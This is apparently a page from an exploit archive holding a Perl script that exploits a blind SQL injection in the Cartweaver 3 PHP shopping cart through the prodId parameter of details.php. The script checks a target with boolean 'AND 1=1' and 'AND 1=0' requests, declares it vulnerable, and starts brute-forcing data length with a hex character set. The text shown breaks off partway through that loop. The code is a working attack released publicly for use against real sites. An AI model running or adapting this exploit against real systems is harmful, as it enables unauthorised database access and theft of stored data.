1 #!/usr/bin/perl
2 ######################
3 #
4 #Cartweaver 3 PHP Blind SQL Injection Substring Vulnerability
5 #
6 ######################
7 #
8 #Bug by: h0yt3r
9 #
10 #Dork: n/a (brainusing required)
11 #
12 ##
13 ###Releasing it to the public
14 ##
15 #
16 #No error messages are being returned.
17 #Exploit need a vaild Product ID!
18 #
19 #SQL Injection:
20 #http://[target]/[path]/details.php?prodId=[SQL]
21 #
22 ##
23 #Gr33tz go to:
24 #b!zZ!t, ramon, thund3r, Free−Hack, Sys−Flaw and of course the neverdying h4ck−y0u Team
25 #
26 ################
27 use LWP::UserAgent;
28 my $userAgent = LWP::UserAgent−>new;
29
30 usage();
31
32 $server = $ARGV[0];
33 $dir = $ARGV[1];
34 $prod_id =$ARGV[2];
35
36
37 print"\n";
38 if (!$dir) { die "Read Usage!\n"; }
39
40
41 $filename ="details.php";
42
43 my $vulnCheck = "http://".$server.$dir.$filename;
44
45 my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76"
,"77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30","21","23","2B","28","29","40","2D","F5","2
5","26","2F","3F");
46
47 print"[x]Connecting:";
48 my $goodSite = $vulnCheck."?prodId=".$prod_id." AND 1=1";
49 my $badSite = $vulnCheck."?prodId=".$prod_id." AND 1=0";
50
Page 1/3
Cartweaver 3 prodId Remote Blind SQL Injection Exploit
n/a
06/14/2008
51 my $Attack1= $userAgent−>get($goodSite);
52 my $Attack2= $userAgent−>get($badSite);
53 if($Attack1−>is_success)
54 {
55 print " Connected \n";
56 print "[x]Vulnerable Check: ";
57
58 if($Attack2−>content =~ m/No product selected./i && $Attack1−>content !~ m/No product selected./i)
59 { print "Vulnerable! \n"; }
60 else
61 { print "Not Vulnerable or wrong Product ID"; exit;}
62 }
63
64 else
65 {
66 print " Connection Failed to ".$goodSite."";
67 exit;
68 }
69
70
71 my $hex="";
72 my $length;
73
74 print "[x]Bruteforcing Length \n";
75
76 my $lengthCounter = 1;
77 while(1)
78 {
79 my $url = "".$vulnCheck."?prodId=".$prod_id."%20and